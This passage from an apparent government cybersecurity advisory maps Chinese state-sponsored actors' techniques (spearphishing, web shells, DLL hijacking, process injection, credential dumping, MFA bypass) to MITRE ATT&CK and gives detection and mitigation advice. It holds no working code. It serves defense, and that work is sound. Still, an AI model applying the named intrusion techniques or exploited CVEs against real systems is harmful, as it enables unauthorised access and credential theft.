[[T1566.002](<https://attack.mitre.org/versions/v9/techniques/T1566/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed conducting spearphishing campaigns. These email compromise attempts range from generic emails with mass targeted phishing attempts to specifically crafted emails in targeted social engineering lures. \nThese compromise attempts use the cyber actors\u2019 dynamic collection of VPSs, previously compromised accounts, or other infrastructure in order to encourage engagement from the target audience through domain typo-squatting and masquerading. These emails may contain a malicious link or files that will provide the cyber actor access to the victim\u2019s device after the user clicks on the malicious link or opens the attachment. \n\n| \n\n * Implement a user training program and simulated spearphishing emails to discourage users from visiting malicious websites or opening malicious attachments and re-enforce the appropriate user responses to spearphishing emails. Quarantine suspicious files with antivirus solutions.\n * Use a network intrusion prevention system (IPS) to scan and remove malicious email attachments.\n * Block uncommon file types in emails that are not needed by general users (`.exe`, `.jar`,`.vbs`)\n * Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using Sender Policy Framework [SPF]) and integrity of messages (using Domain Keys Identified Mail [DKIM]). Enabling these mechanisms within an organization (through policies such as Domain-based Message Authentication, Reporting, and Conformance [DMARC]) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.\n * Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.\n * Prevent users from clicking on malicious links by stripping hyperlinks or implementing \"URL defanging\" at the Email Security Gateway or other email security tools.\n * Add external sender banners to emails to alert users that the email came from an external sender.\n| \n\nHarden: \n\n * Message Hardening \n * Message Authentication [[D3-MAN](<https://d3fend.mitre.org/technique/d3f:MessageAuthentication>)]\n * Transfer Agent Authentication [[D3-TAAN](<https://d3fend.mitre.org/technique/d3f:TransferAgentAuthentication>)]\n\nDetect: \n\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * Message Analysis \n * Sender MTA Reputation Analysis [[D3-SMRA](<https://d3fend.mitre.org/technique/d3f:SenderMTAReputationAnalysis>)]\n * Sender Reputation Analysis [[D3-SRA](<https://d3fend.mitre.org/technique/d3f:SenderReputationAnalysis>)] \n \n \nExternal Remote Services [[T1133](<https://attack.mitre.org/versions/v9/techniques/T1133>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Exploiting vulnerable devices immediately after conducting scans for critical zero-day or publicly disclosed vulnerabilities. The cyber actors used or modified public proof of concept code in order to exploit vulnerable systems.\n\n * Targeting Microsoft Exchange offline address book (OAB) virtual directories (VDs).\n\n * Exploiting Internet accessible webservers using webshell small code injections against multiple code languages, including `net`, `asp`, `apsx`, `php`, `japx`, and `cfm`. \n\n**Note:** refer to the references listed above in Exploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)] for information on CVEs known to be exploited by malicious Chinese cyber actors.\n\n**Note: **this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)].\n\n| \n\n * Many exploits can be mitigated by applying available patches for vulnerabilities (such as CVE-2019-11510, CVE-2019-19781, and CVE-2020-5902) affecting external remote services.\n * Reset credentials after virtual private network (VPN) devices are upgraded and reconnected to the external network.\n * Revoke and generate new VPN server keys and certificates (this may require redistributing VPN connection information to users).\n * Disable Remote Desktop Protocol (RDP) if not required for legitimate business functions.\n * Restrict VPN traffic to and from managed service providers (MSPs) using a dedicated VPN connection.\n * Review and verify all connections between customer systems, service provider systems, and other client enclaves.\n| \n\nHarden:\n\n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\nDetect:\n\n * Network Traffic Analysis \n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n * Platform Monitoring [[D3-PM](<https://d3fend.mitre.org/technique/d3f:PlatformMonitoring>)]\n * Process Analysis \n * Process Spawn Analysis [[D3-SPA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)] \n \nValid Accounts [[T1078](<https://attack.mitre.org/versions/v9/techniques/T1078>)]:\n\n * Default Accounts [[T1078.001](<https://attack.mitre.org/versions/v9/techniques/T1078/001>)]\n\n * Domain Accounts [[T1078.002](<https://attack.mitre.org/versions/v9/techniques/T1078/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed: gaining credential access into victim networks by using legitimate, but compromised credentials to access OWA servers, corporate login portals, and victim networks.\n\n**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)], Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)], and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Adhere to best practices for password and permission management.\n * Ensure that MSP accounts are not assigned to administrator groups and restrict those accounts to only systems they manage \n * Do not store credentials or sensitive data in plaintext.\n * Change all default usernames and passwords.\n * Routinely update and secure applications using Secure Shell (SSH). \n * Update SSH keys regularly and keep private keys secure.\n * Routinely audit privileged accounts to identify malicious use.\n| \n\nHarden: \n\n * Credential Hardening \n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]\n\nDetect:\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n * Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)] \n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)] \n \n### Tactics: _Execution_ [[TA0002](<https://attack.mitre.org/versions/v9/tactics/TA0002>)]\n\n_Table IV: Chinese state-sponsored cyber actors\u2019 Execution TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDefensive Tactics and Techniques \n \n---|---|---|--- \n \nCommand and Scripting Interpreter [[T1059](<https://attack.mitre.org/versions/v9/techniques/T1059>)]: \n\n * PowerShell\u00ae [[T1059.001](<https://attack.mitre.org/versions/v9/techniques/T1059/001>)]\n\n * Windows\u00ae Command Shell [[T1059.003](<https://attack.mitre.org/versions/v9/techniques/T1059/003>)]\n\n * Unix\u00ae Shell [[T1059.004](<https://attack.mitre.org/versions/v9/techniques/T1059/004>)]\n\n * Python [[T1059.006](<https://attack.mitre.org/versions/v9/techniques/T1059/006>)]\n\n * JavaScript [[T1059.007](<https://attack.mitre.org/versions/v9/techniques/T1059/007>)]\n\n * Network Device CLI [[T1059.008](<https://attack.mitre.org/versions/v9/techniques/T1059/008>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Using cmd.exe, JavaScript/Jscript Interpreter, and network device command line interpreters (CLI).\n\n * Using PowerShell to conduct reconnaissance, enumeration, and discovery of the victim network. \n\n * Employing Python scripts to exploit vulnerable servers.\n\n * Using a UNIX shell in order to conduct discovery, enumeration, and lateral movement on Linux\u00ae servers in the victim network.\n\n| \n\nPowerShell\n\n * Turn on PowerShell logging. (**Note:** this works better in newer versions of PowerShell. NSA, CISA, and FBI recommend using version 5 or higher.)\n\n * Push Powershell logs into a security information and event management (SIEM) tool.\n\n * Monitor for suspicious behavior and commands. Regularly evaluate and update blocklists and allowlists.\n\n * Use an antivirus program, which may stop malicious code execution that cyber actors attempt to execute via PowerShell.\n\n * Remove PowerShell if it is not necessary for operations. \n\n * Restrict which commands can be used.\n\nWindows Command Shell\n\n * Restrict use to administrator, developer, or power user systems. Consider its use suspicious and investigate, especially if average users run scripts. \n\n * Investigate scripts running out of cycle from patching or other administrator functions if scripts are not commonly used on a system, but enabled. \n\n * Monitor for and investigate other unusual or suspicious scripting behavior. \n\nUnix\n\n * Use application controls to prevent execution.\n\n * Monitor for and investigate unusual scripting behavior. Use of the Unix shell may be common on administrator, developer, or power user systems. In this scenario, normal users running scripts should be considered suspicious. \n\n * If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions should be considered suspicious. \n\nPython\n\n * Audit inventory systems for unauthorized Python installations.\n\n * Blocklist Python where not required.\n\n * Prevent users from installing Python where not required.\n\nJavaScript\n\n * Turn off or restrict access to unneeded scripting components.\n\n * Blocklist scripting where appropriate.\n\n * For malicious code served up through ads, adblockers can help prevent that code from executing.\n\nNetwork Device Command Line Interface (CLI)\n\n * Use TACACS+ to keep control over which commands administrators are permitted to use through the configuration of authentication and command authorization.\n\n * Use an authentication, authorization, and accounting (AAA) systems to limit actions administrators can perform and provide a history of user actions to detect unauthorized use and abuse.\n\n * Ensure least privilege principles are applied to user accounts and groups.\n\n| \n\nHarden: \n\n * Platform Hardening [[D3-PH](<https://d3fend.mitre.org/technique/d3f:PlatformHardening>)]\n\nDetect: \n\n * Process Analysis\n\n * Script Execution Analysis [[D3-SEA](<https://d3fend.mitre.org/technique/d3f:ScriptExecutionAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nScheduled Task/Job [[T1053](<https://attack.mitre.org/versions/v9/techniques/T1053>)]\n\n * Cron [[T1053.003](<https://attack.mitre.org/versions/v9/techniques/T1053/003>)]\n * Scheduled Task [[T1053.005](<https://attack.mitre.org/versions/v9/techniques/T1053/005>)]\n| \n\nChinese state-sponsored cyber actors have been observed using Cobalt Strike, webshells, or command line interface tools, such as `schtask` or `crontab` to create and schedule tasks that enumerate victim devices and networks.\n\n**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)] and Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)].\n\n| \n\n\u2022 Monitor scheduled task creation from common utilities using command-line invocation and compare for any changes that do not correlate with known software, patch cycles, or other administrative activity. \n\u2022 Configure event logging for scheduled task creation and monitor process execution from `svchost.exe` (Windows 10) and Windows Task Scheduler (Older version of Windows) to look for changes in `%systemroot%\\System32\\Tasks` that do not correlate with known software, patch cycles, or other administrative activity. Additionally monitor for any scheduled tasks created via command line utilities\u2014such as PowerShell or Windows Management Instrumentation (WMI)\u2014that do not conform to typical administrator or user actions. \n\n| \n\nDetect: \n\n * Platform Monitoring \n * Operating System Monitoring [[D3-OSM](<https://d3fend.mitre.org/technique/d3f:OperatingSystemMonitoring>)] \n * Scheduled Job Analysis [[D3-SJA](<https://d3fend.mitre.org/technique/d3f:ScheduledJobAnalysis>)]\n * System Daemon Monitoring [[D3-SDM](<https://d3fend.mitre.org/technique/d3f:SystemDaemonMonitoring>)]\n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nUser Execution [[T1204](<https://attack.mitre.org/versions/v9/techniques/T1204>)]\n\n * Malicious Link [[T1204.001](<https://attack.mitre.org/versions/v9/techniques/T1204/001>)]\n * Malicious File [[T1204.002](<https://attack.mitre.org/versions/v9/techniques/T1204/002>)]\n| \n\nChinese state-sponsored cyber actors have been observed conducting spearphishing campaigns that encourage engagement from the target audience. These emails may contain a malicious link or file that provide the cyber actor access to the victim\u2019s device after the user clicks on the malicious link or opens the attachment.\n\n| \n\n * Use an antivirus program, which may stop malicious code execution that cyber actors convince users to attempt to execute.\n * Prevent unauthorized execution by disabling macro scripts from Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications.\n * Use a domain reputation service to detect and block suspicious or malicious domains.\n * Determine if certain categories of websites are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.\n * Ensure all browsers and plugins are kept up to date.\n * Use modern browsers with security features turned on.\n * Use browser and application sandboxes or remote virtual environments to mitigate browser or other application exploitation.\n| \n\nDetect: \n\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n * File Content Rules [[D3-FCR](<https://d3fend.mitre.org/technique/d3f:FileContentRules>)]\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * Network Traffic Analysis \n * DNS Traffic Analysis [[D3-DNSTA](<https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]\n * Network Isolation \n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)]\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \n### Tactics: _Persistence_ [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)]\n\n_Table V: Chinese state-sponsored cyber actors\u2019 Persistence TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nHijack Execution Flow [[T1574](<https://attack.mitre.org/versions/v9/techniques/T1574>)]: \n\n * DLL Search Order Hijacking [[T1574.001](<https://attack.mitre.org/versions/v9/techniques/T1574/001>)]\n| \n\nChinese state-sponsored cyber actors have been observed using benign executables which used Dynamic Link Library (DLL) load-order hijacking to activate the malware installation process. \n\n**Note:** this technique also applies to Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)] and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Disallow loading of remote DLLs.\n * Enable safe DLL search mode.\n * Implement tools for detecting search order hijacking opportunities.\n * Use application allowlisting to block unknown DLLs.\n * Monitor the file system for created, moved, and renamed DLLs.\n * Monitor for changes in system DLLs not associated with updates or patches.\n * Monitor DLLs loaded by processes (e.g., legitimate name, but abnormal path).\n| \n\nDetect: \n\n * Platform Monitoring \n * Operating System Monitoring \n * Service Binary Verification [[D3-SBV](<https://d3fend.mitre.org/technique/d3f:ServiceBinaryVerification>)]\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nModify Authentication Process [[T1556](<https://attack.mitre.org/versions/v9/techniques/T1556>)]\n\n * Domain Controller Authentication [[T1556.001](<https://attack.mitre.org/versions/v9/techniques/T1556/001>)]\n| \n\nChinese state-sponsored cyber actors were observed creating a new sign-in policy to bypass MFA requirements to maintain access to the victim network. \nNote: this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)] and Credential Access [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)].\n\n| \n\n * Monitor for policy changes to authentication mechanisms used by the domain controller. \n * Monitor for modifications to functions exported from authentication DLLs (such as `cryptdll.dll` and `samsrv.dll`).\n * Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. \n * Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts (for example, one account logged into multiple systems simultaneously, multiple accounts logged into the same machine simultaneously, accounts logged in at odd times or outside of business hours). \n * Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n * Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for and correlate changes to Registry entries.\n| \n\nDetect: \n\n * Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)]\n * User Behavior Analysis \n * Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)]\n * User Geolocation Logon Pattern Analysis [[D3-UGLPA](<https://d3fend.mitre.org/technique/d3f:UserGeolocationLogonPatternAnalysis>)] \n \nServer Software Component [[T1505](<https://attack.mitre.org/versions/v9/techniques/T1505>)]: \n\n * Web Shell [[T1505.003](<https://attack.mitre.org/versions/v9/techniques/T1505/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed planting web shells on exploited servers and using them to provide the cyber actors with access to the victim networks. \n\n| \n\n * Use Intrusion Detection Systems (IDS) to monitor for and identify China Chopper traffic using IDS signatures.\n * Monitor and search for predictable China Chopper shell syntax to identify infected files on hosts.\n * Perform integrity checks on critical servers to identify and investigate unexpected changes.\n * Have application developers sign their code using digital signatures to verify their identity.\n * Identify and remediate web application vulnerabilities or configuration weaknesses. Employ regular updates to applications and host operating systems.\n * Implement a least-privilege policy on web servers to reduce adversaries\u2019 ability to escalate privileges or pivot laterally to other hosts and control creation and execution of files in particular directories.\n * If not already present, consider deploying a DMZ between web-facing systems and the corporate network. Limiting the interaction and logging traffic between the two provides a method to identify possible malicious activity.\n * Ensure secure configuration of web servers. All unnecessary services and ports should be disabled or blocked. Access to necessary services and ports should be restricted, where feasible. This can include allowlisting or blocking external access to administration panels and not using default login credentials.\n * Use a reverse proxy or alternative service, such as mod_security, to restrict accessible URL paths to known legitimate ones.\n * Establish, and backup offline, a \u201cknown good\u201d version of the relevant server and a regular change management policy to enable monitoring for changes to servable content with a file integrity system.\n * Employ user input validation to restrict exploitation of vulnerabilities.\n * Conduct regular system and application vulnerability scans to establish areas of risk. While this method does not protect against zero-day exploits, it will highlight possible areas of concern.\n * Deploy a web application firewall and conduct regular virus signature checks, application fuzzing, code reviews, and server network analysis.\n| \n\nDetect: \n\n * Network Traffic Analysis \n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n * Per Host Download-Upload Ratio Analysis [[D3-PHDURA](<https://d3fend.mitre.org/technique/d3f:PerHostDownload-UploadRatioAnalysis>)]\n * Process Analysis \n * Process Spawn Analysis \n * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]\n\nIsolate:\n\n * Network Isolation \n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nCreate or Modify System Process [[T1543](<https://attack.mitre.org/versions/v9/techniques/T1543>)]:\n\n * Windows Service [[T1543.003](<https://attack.mitre.org/versions/v9/techniques/T1543/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed executing malware shellcode and batch files to establish new services to enable persistence.\n\n**Note: **this technique also applies to Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)].\n\n| \n\n * Only allow authorized administrators to make service changes and modify service configurations. \n * Monitor processes and command-line arguments for actions that could create or modify services, especially if such modifications are unusual in your environment.\n * Monitor WMI and PowerShell for service modifications.\n| Detect: \n\n * Process Analysis \n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \n### Tactics: _Privilege Escalation_ [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)]\n\n_Table VI: Chinese state-sponsored cyber actors\u2019 Privilege Escalation TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nDomain Policy Modification [[T1484](<https://attack.mitre.org/versions/v9/techniques/T1484>)]\n\n * Group Policy Modification [[T1484.001](<https://attack.mitre.org/versions/v9/techniques/T1484/001>)]\n\n| \n\nChinese state-sponsored cyber actors have also been observed modifying group policies for password exploitation.\n\n**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Identify and correct Group Policy Object (GPO) permissions abuse opportunities (e.g., GPO modification privileges) using auditing tools.\n * Monitor directory service changes using Windows event logs to detect GPO modifications. Several events may be logged for such GPO modifications.\n * Consider implementing WMI and security filtering to further tailor which users and computers a GPO will apply to.\n| \n\nDetect:\n\n * Network Traffic Analysis \n * Administrative Network Activity Analysis [[D3-ANAA](<https://d3fend.mitre.org/technique/d3f:AdministrativeNetworkActivityAnalysis>)]\n * Platform Monitoring \n * Operating System Monitoring \n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)] \n \nProcess Injection [[T1055](<https://attack.mitre.org/versions/v9/techniques/T1055>)]: \n\n * Dynamic Link Library Injection [[T1055.001](<https://attack.mitre.org/versions/v9/techniques/T1055/001>)]\n * Portable Executable Injection [[T1055.002](<https://attack.mitre.org/versions/v9/techniques/T1055/002>)]\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Injecting into the `rundll32.exe` process to hide usage of Mimikatz, as well as injecting into a running legitimate `explorer.exe` process for lateral movement.\n * Using shellcode that injects implants into newly created instances of the Service Host process (`svchost`)\n\n**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)]. \n\n\n| \n\n * Use endpoint protection software to block process injection based on behavior of the injection process.\n * Monitor DLL/Portable Executable (PE) file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.\n * Monitor for suspicious sequences of Windows API calls such as `CreateRemoteThread`, `VirtualAllocEx`, or `WriteProcessMemory` and analyze processes for unexpected or atypical behavior such as opening network connections or reading files.\n * To minimize the probable impact of a threat actor using Mimikatz, always limit administrative privileges to only users who actually need it; upgrade Windows to at least version 8.1 or 10; run Local Security Authority Subsystem Service (LSASS) in protected mode on Windows 8.1 and higher; harden the local security authority (LSA) to prevent code injection.\n| \n\n * Execution Isolation \n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Defense Evasion _[[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)]\n\n_Table VII: Chinese state-sponsored cyber actors\u2019 Defensive Evasion TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nDeobfuscate/Decode Files or Information [[T1140](<https://attack.mitre.org/versions/v9/techniques/T1140>)]\n\n| \n\nChinese state-sponsored cyber actors were observed using the 7-Zip utility to unzip imported tools and malware files onto the victim device.\n\n| \n\n * Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.\n * Consider blocking, disabling, or monitoring use of 7-Zip.\n| \n\nDetect: \n\n * Process Analysis \n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)] \n \nHide Artifacts [[T1564](<https://attack.mitre.org/versions/v9/techniques/T1564>)]\n\n| \n\nChinese state-sponsored cyber actors were observed using benign executables which used DLL load-order hijacking to activate the malware installation process.\n\n| \n\n * Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts, such as executables using DLL load-order hijacking that can activate malware.\n * Monitor event and authentication logs for records of hidden artifacts being used.\n * Monitor the file system and shell commands for hidden attribute usage.\n| \n\nDetect: \n\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n\nIsolate:\n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nIndicator Removal from Host [[T1070](<https://attack.mitre.org/versions/v9/techniques/T1070>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed deleting files using `rm` or `del` commands. \nSeveral files that the cyber actors target would be timestomped, in order to show different times compared to when those files were created/used.\n\n| \n\n * Make the environment variables associated with command history read only to ensure that the history is preserved.\n * Recognize timestomping by monitoring the contents of important directories and the attributes of the files. \n * Prevent users from deleting or writing to certain files to stop adversaries from maliciously altering their `~/.bash_history` or `ConsoleHost_history.txt` files.\n * Monitor for command-line deletion functions to correlate with binaries or other files that an adversary may create and later remove. Monitor for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce.\n * Monitor and record file access requests and file handles. An original file handle can be correlated to a compromise and inconsistencies between file timestamps and previous handles opened to them can be a detection rule.\n| \n\nDetect: \n\n * Platform Monitoring \n * Operating System Monitoring \n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n\nIsolate:\n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nObfuscated Files or Information [[T1027](<https://attack.mitre.org/versions/v9/techniques/T1027>)]\n\n| \n\nChinese state-sponsored cyber actors were observed Base64 encoding files and command strings to evade security measures.\n\n| \n\nConsider utilizing the Antimalware Scan Interface (AMSI) on Windows 10 to analyze commands after being processed/interpreted.\n\n| \n\nDetect:\n\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n \nSigned Binary Proxy Execution [[T1218](<https://attack.mitre.org/versions/v9/techniques/T1218>)]\n\n * `Mshta` [[T1218.005](<https://attack.mitre.org/versions/v9/techniques/T1218/005>)]\n\n * `Rundll32` [[T1218.011](<https://attack.mitre.org/versions/v9/techniques/T1218/011>)]\n\n| \n\nChinese state-sponsored cyber actors were observed using Microsoft signed binaries, such as `Rundll32`, as a proxy to execute malicious payloads.\n\n| \n\nMonitor processes for the execution of known proxy binaries (e.g., r`undll32.exe`) and look for anomalous activity that does not follow historically good arguments and loaded DLLs associated with the invocation of the binary.\n\n| \n\nDetect:\n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \n### Tactics: _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)]\n\n_Table VIII: Chinese state-sponsored cyber actors\u2019 Credential Access TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nExploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v9/techniques/T1212>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed exploiting Pulse Secure VPN appliances to view and extract valid user credentials and network information from the servers.\n\n| \n\n * Update and patch software regularly.\n\n * Use cyber threat intelligence and open-source reporting to determine vulnerabilities that threat actors may be actively targeting and exploiting; patch those vulnerabilities immediately.\n\n| \n\nHarden: \n\n * Platform Hardening\n\n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\n * Credential Hardening\n\n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)] \n \nOS Credential Dumping [[T1003](<https://attack.mitre.org/versions/v9/techniques/T1003>)] \n\u2022 LSASS Memory [[T1003.001](<https://attack.mitre.org/versions/v9/techniques/T1003/001>)] \n\u2022 NTDS [[T1003.003](<https://attack.mitre.org/versions/v9/techniques/T1003/003>)]\n\n| \n\nChinese state-sponsored cyber actors were observed targeting the LSASS process or Active directory (`NDST.DIT)` for credential dumping.\n\n| \n\n * Monitor process and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the `NDST.DIT`.\n\n * Ensure that local administrator accounts have complex, unique passwords across all systems on the network.\n\n * Limit credential overlap across accounts and systems by training users and administrators not to use the same passwords for multiple accounts.\n\n * Consider disabling or restricting NTLM. \n\n * Consider disabling `WDigest` authentication. \n\n * Ensure that domain controllers are backed up and properly secured (e.g., encrypt backups).\n\n * Implement Credential Guard to protect the LSA secrets from credential dumping on Windows 10. This is not configured by default and requires hardware and firmware system requirements. \n\n * Enable Protected Process Light for LSA on Windows 8.1 and Windows Server 2012 R2.\n\n| \n\nHarden:\n\n * Credential Hardening [[D3-CH](<https://d3fend.mitre.org/technique/d3f:CredentialHardening>)]\n\nDetect: \n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\nIsolate: \n\n * Execution Isolation\n\n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] 